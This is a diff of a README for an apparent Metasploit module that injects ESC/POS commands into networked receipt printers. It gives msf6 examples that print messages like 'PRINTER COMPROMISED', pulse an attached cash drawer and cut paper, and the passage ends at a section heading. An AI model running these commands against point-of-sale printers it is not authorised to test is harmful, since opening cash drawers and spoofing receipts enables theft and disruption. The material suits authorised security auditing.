futileskills/ESCPOS-Injector-Documentation-/README.md

     RPORT (Target Port): The port used for communication (default is 9100).

-    MESSAGE: The text string you want to print.

-    PRINT_MESSAGE: A boolean flag to print the message.
+    ACTION: The specific command to execute. options are:
+        - PRINT (Default): Print a custom message.

-    TRIGGER_DRAWER: A boolean flag to activate the cash drawer.
+        - DRAWER: Trigger the attached cash drawer.

-    CUT_PAPER: A boolean flag to feed and cut the paper.
+        - CUT: Feed lines and cut the paper.

+    MESSAGE: The text string you want to print (Required if ACTION is PRINT).

-    FEED_LINES: An integer to specify how many lines to feed before cutting.
+    DRAWER_COUNT: An integer to specify how many times to pulse the cash drawer (Required if ACTION is DRAWER).

-    DRAWER_COUNT: An integer to specify how many times to pulse the cash drawer.
+    FEED_LINES: An integer to specify how many lines to feed before cutting (Required if ACTION is CUT).

 **Example Usage**

-Here are a few usage examples demonstrating the module's versatility:
+Here are usage examples demonstrating the module's actions:

-**Basic Message Injection**
+**Basic Message Injection (PRINT Action)**

-This will send a simple, sanitized message to the printer.
+This will send a simple, sanitized message to the printer using the default PRINT action.

 ```
 msf6 > set RHOSTS 192.168.1.100
-msf6 > set PRINT_MESSAGE true
+msf6 > set ACTION PRINT
 msf6 > set MESSAGE "WARNING: PRINTER COMPROMISED"
 msf6 > run

 ```

-**Triggering the Cash Drawer**
+**Triggering the Cash Drawer (DRAWER Action)**

-This will send the cash drawer pulse command, with no other actions.
+This will send the cash drawer pulse command.

 ```
 msf6 > set RHOSTS 192.168.1.100
-msf6 > set TRIGGER_DRAWER true
+msf6 > set ACTION DRAWER
 msf6 > set DRAWER_COUNT 3
 msf6 > run

 ```
 **Full Receipt Simulation**

-This will print a message, feed the paper, and cut it, simulating a full receipt.
+Because the module separates functionality into distinct actions, a full simulation involves printing the message first, then switching actions to feed and cut the paper.

 ```
 msf6 > set RHOSTS 192.168.1.100
-msf6 > set PRINT_MESSAGE true
+msf6 > set ACTION PRINT
 msf6 > set MESSAGE "Audit complete.
 This device is vulnerable."
+msf6 > run
+[*] Printed message: 'Audit complete.
+This device is vulnerable.'

-msf6 > set CUT_PAPER true
+msf6 > set ACTION CUT
 msf6 > set FEED_LINES 10
 msf6 > run
+[*] Paper fed and cut.

 ```
 ### 5. Testing from a Linux Terminal (Without Metasploit)